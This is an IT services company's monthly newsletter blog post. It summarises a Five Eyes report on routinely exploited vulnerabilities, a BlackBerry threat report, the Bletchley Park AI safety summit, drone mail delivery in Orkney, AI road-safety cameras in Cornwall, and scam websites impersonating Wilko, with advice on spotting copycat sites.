August 2023 Newsletter

Posted By: Mark Saturday 16th September 2023 Tags: , , , , , , , , , , ,

This month: Vulnerability report from Five Eyes collective; rising malware threat; AI safety summit coming to the UK; deliveries by drone; AI road safety cameras catch hundreds; warning over scam Wilko websites exploiting the company’s administration.

Newsletter Image: Five Eyes Annual Vulnerability Report

Five Eyes Annual Vulnerability Report

Five Eyes, the collective of Intelligence and cyber security officials from the USA, Australia, Canada, New Zealand and United Kingdom, has released its latest list of old vulnerabilities. These flaws are still being actively exploited against organisations who have still have unpatched systems.

Top Routinely Exploited Vulnerabilities

  1. CVE-2018-13379. This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
  2. CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
  3. CVE-2021-40539. This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
  4. CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
  5. CVE-2021- 44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021- 44228 through the first half of 2022.
  6. CVE-2022-22954, CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
  7. CVE-2022-1388. This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
  8. CVE-2022-30190. This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.
  9. CVE-2022-26134. This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability, CVE-2021-26084, which cyber actors also exploited in 2022.

As well as best practice advice for vendors and developers, Five Eyes gives the usual sage advice for and users, including: keep software, operating systems, applications, and firmware on IT network assets up to date, and use advised workarounds where patches aren’t immediately available. Keep all systems, wares and services catalogued, Monitor all networks for anomalies. Keep regular secure backups. Maintain a tested cyber incident recovery plan. Implement zero trust architecture. Keep things properly configured. Regularly review valid user access.

If you’re a business in Stockton-on-Tees, Middlesbrough, Durham, Newcastle, Sunderland — and all the surrounding areas of the North East Of England — and need your IT systems reviewing, get in touch.

Newsletter Image: Public Sector Malware Surge

Public Sector Malware Surge

The latest quarterly BlackBerry Global Threat Intelligence Report finds governments and public services are facing 40% more cyberattacks than they did in the previous quarter.

Between March and May of this year BlackBerry Cybersecurity solutions stopped 1,528,488 cyberattacks, with around 225 thousand of these attacks being new strains of malware, which was a 13% increase in unique samples.

Report Highlights

90 days by the numbers: From March 2023 to May 2023, threat actors deployed approximately 11.5 attacks per minute. These threats included roughly 1.7 novel malware samples per minute, indicating a 13% increase from the previous reporting period’s average. This increase demonstrates that attackers are diversifying their tools in an attempt to bypass defensive controls.

Most targeted industries: The healthcare and financial services industries continue to be among the most targeted sectors. Lucrative targets for cybercriminals because of the valuable data and critical services performed within the sector. Ransomware and infostealers are a common threat.

Government entities and then critical infrastructure are the next-most targeted. Cyber security researchers attribute so many attacks on things like schools, public utilities, transport networks, etc, because of the limited cyber defence resources invested into publicly funded organisations. These areas are also prime targets for state-funded cyber gangs as well as the more general cybercriminals.

Remote access increases cyber risk: Financial institutions face persistent threats due to their economic significance and concentration of sensitive data. The report details these challenges, exacerbated by the growing availability of commodity malware ransomware attacks, and the rise in malware targeting digital and mobile banking services. Researchers uncovered mobile threats like data exfiltration, financial app spoofing, SMS text interceptors, and more. Mobile malware is on the rise.

Country-specific cyberattacks: In the second quarter of 2023, APT28 and the Lazarus Group — state-sponsored threat actors linked to Russia and North Korea, respectively — became extremely active. These actors typically target the United States, Europe, and South Korea, with a focus on targeting government agencies, military organizations, businesses, and financial institutions. They also frequently adapt their techniques to make their attacks harder to detect and defend against.

Ismael Valenzuela, Vice President of Threat Research and Intelligence at BlackBerry, said:

“Governments and public services, such as public transit, electricity, water services, schools, and non-profit organisations, stand as unfortunate bullseyes for cybercriminals and other threat actors, whose attacks seek to wreak maximum havoc and who often times face very little resistance.

“With limited resources and immature cyber defense programs, these organisations are struggling to defend against the double pronged threat of both nation states and cybercriminals. Now, more than ever, they need access to actionable cyber intelligence to direct and strengthen their security strategies, while safeguarding the vital services, institutions, and trust upon which our societies thrive.”

While this report is focused on the threat to public and government entities, the threats mentioned in the report are also applicable to every sector and business in operation. Your company needs to implement robust cyber security practices to keep your important data safe. If you’re a business in Teesside, Durham, Tyne & Wear, Northumberland, North Yorkshire or anywhere around the North East of England, get in touch about our services.

Newsletter Image: Global AI Safety Summit Coming To UK

Global AI Safety Summit Coming To UK

The UK will host the world’s first summit on artificial intelligence safety in November. World leaders, big tech chiefs, and leading researchers in the field of artificial intelligence will gather at Bletchley Park on the 1st and 2nd of November.

While supporters of AI laud the promises to improve productivity and automation of manually intensive processes across the public and private sectors, there are concerned voices warning of risks that AI could amplify existing bias, propagate misinformation.

The conference will look at the risks of AI and how these can be mitigated through internationally coordinated action, where global players will ‘explore and build consensus on rapid, international action to advance safety at the frontier of AI technology’. It will build on ongoing work at international forums including the OECD, Global Partnership on AI, Council of Europe, and the UN and standards-development organisations, as well as the recently agreed G7 Hiroshima AI Process.

Roots Of AI Within Codebreakers Team

Bletchley Park is a symbolic location in the history of computer science development, primarily known to the general public as the home of the British Enigma codebreakers and the genius of Alan Turing. The roots of AI can be traced back to the leading minds who worked at Bletchley during the Second World War, with codebreakers Jack Good and Donald Michie among those who went on to write extensive works on the technology.

UK Wants To Be An AI Tech Leader

Prime Minister, Rishi Sunak, wants to promote the UK’s AI credentials in a tech-focused future. Task forces have been set up and investment pledges made.

The Prime Minister said:

“To fully embrace the extraordinary opportunities of artificial intelligence, we must grip and tackle the risks to ensure it develops safely in the years ahead.

“With the combined strength of our international partners, thriving AI industry and expert academic community, we can secure the rapid international action we need for the safe and responsible development of AI around the world.”

Technology Secretary, Michelle Donelan, said:

“International collaboration is the cornerstone of our approach to AI regulation, and we want the summit to result in leading nations and experts agreeing on a shared approach to its safe use.

“AI is already improving lives from new innovations in healthcare to supporting efforts to tackle climate change, and November’s summit will make sure we can all realise the technology’s huge benefits safely and securely for decades to come.”

Foreign Secretary, James Cleverly, said:

“No country will be untouched by AI, and no country alone will solve the challenges posed by this technology. In our interconnected world, we must have an international approach.”

Iain Standen, CEO of the Bletchley Park Trust, said:

“Bletchley Park Trust is immensely privileged to have been chosen as the venue for the first major international summit on AI safety this November, and we look forward to welcoming the world to our historic site.

“It is fitting that the very spot where leading minds harnessed emerging technologies to influence the successful outcome of World War Two will, once again, be the crucible for international co-ordinated action.

“We are incredibly excited to be providing the stage for discussions on global safety standards, which will help everyone manage and monitor the risks of artificial intelligence.”

You can read the full UK Government press release here.

Newsletter Image: UK's First Drone Mail Delivery Service

UK’s First Drone Mail Delivery Service

The BBC reports that Orkney has become the first location in the UK to have mail delivered by drone. The three-month trial sees the creation of ‘Orkney I-Port’, in a collaboration between Royal Mail and Skyports drones, and in partnership with Orkney Islands Council Harbour Authority and Loganair, to perform a daily distribution of letters and parcels across three islands.

While the trial is pencilled in for three-months, Royal Mail says that this is the first UK drone delivery project which could be conducted on a permanent basis under existing regulatory frameworks that are quite unique to the Orkneys due to their landscape and proximity. Flights here can be conducted using extended visual line of sight (EVLOS) permissions rather than beyond visual line of sight (BVLOS) permissions.

The I-Port operation should greatly improve service levels and access for rural communities, significantly shortening delivery times to Graemsay and Hoy, says Royal Mail.

The weather and geography of Orkney can cause interruptions to the delivery service as poor weather can affect the ferry schedules on safety grounds. The inter-island electric drone delivery will also bring safety improvements and emissions reductions.

Chris Paxton, head of drone trials at Royal Mail, said:

“We are proud to be working with Skyports to deliver via drone to some of the more remote communities that we serve in the UK.

“Using a fully electric drone supports Royal Mail’s continued drive to reduce emissions associated with our operations, whilst connecting the island communities we deliver to.”

Alex Brown, director of Skyports Drone Services, said:

“By leveraging drone technology, we are revolutionising mail services in remote communities, providing more efficient and timely delivery, and helping to reduce the requirement for emissions-producing vehicles.

“We’re pleased to be once again partnering with Royal Mail to demonstrate how drone operations can benefit UK logistics on this project.”

Newsletter Image: New AI Camera Catches Hundreds Of Motorists

New AI Camera Catches Hundreds Of Motorists

A new, state of the art, artificial intelligence-based road safety system accounted for 300 law-breaking drivers in it’s first three days of action on one of Cornwall’s busiest roads.

The A30, in Cornwall, saw the first ever use of the road monitoring system, where it detected 180 seat belt offences, along with 117 mobile phone offences, in those first 72 hours of use. It has gone on to capture more than 1,500 drivers in its first full week.

The new free-standing camera system allows for mobility and easy redeployment to different areas around the Devon and Cornwall area. While AI is used for the detection of possible offences, any recordings are reviewed by human operators before action is taken. They will decide if any offence has actually occurred, and then send out a warning letter or notice of prosecution, as appropriate.

Adrian Leisk, Head of Road Safety for Devon & Cornwall Police, said:

“When we trialled this technology last year, we were disappointed by the number of drivers detected not wearing seatbelts – particularly as we continue to see serious and fatal collisions involving people who were not wearing seatbelts, a third of all fatal collisions in 2021 involved someone who wasn’t wearing a seatbelt.

“The early results from our latest deployment show that there is also a problem with mobile phone use behind the wheel, which is both dangerous and illegal.

“While we know the majority of drivers in Devon and Cornwall are safe, respectful and conscientious motorists, sadly putting people’s lives at risk.

“We are employing this new technology to send a clear message to anyone who continues to use their phone behind the wheel – you will get caught.”

Newsletter Image: Fake Wilko Websites Warning

Fake Wilko Websites Warning

Shoppers are being cautioned about a number of scam websites pretending to be the retailer which recently fell into administration. The fake sites are attempting to deceive bargain hunters by offering heavily discounted goods.

Administrators, PwC, announced they were attempting to shut down at last ten fake websites while carrying on their search for a buyer. The genuine Wilko website was closed down as soon as administrators took control, with products only available to buy from the physical stores. No goods being sold online, no online orders fulfilled, no delivery options available or even click and collect from their stores.

Retail Gazette reports that a scam site was posting discount deals on social media. They were offering a sofa — a category that Wilko does not sell — for £4.99 and discounts of “up to 90%”, telling consumers that “because there are still a lot of goods piled up in the warehouse, we are going to sell at a super low price”.

A spokesperson for PwC, said:

“We have been made aware of a number of fake Wilko websites which are offering Wilko products at heavily discounted prices.

“These websites are not genuine and have been set up to scam users, the only legitimate Wilko website is www.wilko.com.

“We are in the process of working with the relevant authorities to have these websites removed. We would like to remind our customers that all Wilko sales are now in-store and you are unable to purchase items online.”

Lisa Webb, consumer law expert at Which?, said:

“Criminals are always on the lookout for new ways to part people from their hard-earned cash and these dodgy websites offering heavily discounted Wilko goods are no exception.

“If you are keen to get a bargain from Wilko, you can only buy in-store at the moment so anything online should be taken with a pinch of salt. If you or a loved one do fall victim to a scam then contact your bank immediately and report it to Action Fraud or Police Scotland.”

How To Avoid Scam Websites

Trading Standards has the following advice about staying safe when shopping online:

  • Make sure that the website address (URL) is correct and matches the site you intended to visit. Copycat websites often have similar URLs to the legitimate sites, but with small differences such as spelling errors or a different domain extension
  • Check for the padlock icon in the address bar which indicates the connection is secure. However, don’t rely on the padlock icon alone
  • Legitimate websites usually have contact information such as a phone number, email address, or physical address. But some copycat websites might have contact details, so don’t rely on them alone either
  • Be wary of websites that have poor grammar, spelling errors or low-quality images
  • Check for reviews of the website. These can give you an idea of other people’s experiences with the site and whether it is trustworthy
  • Don’t rush. Take your time to research the website and make sure it is legitimate before making any transactions or providing personal information

Stay safe.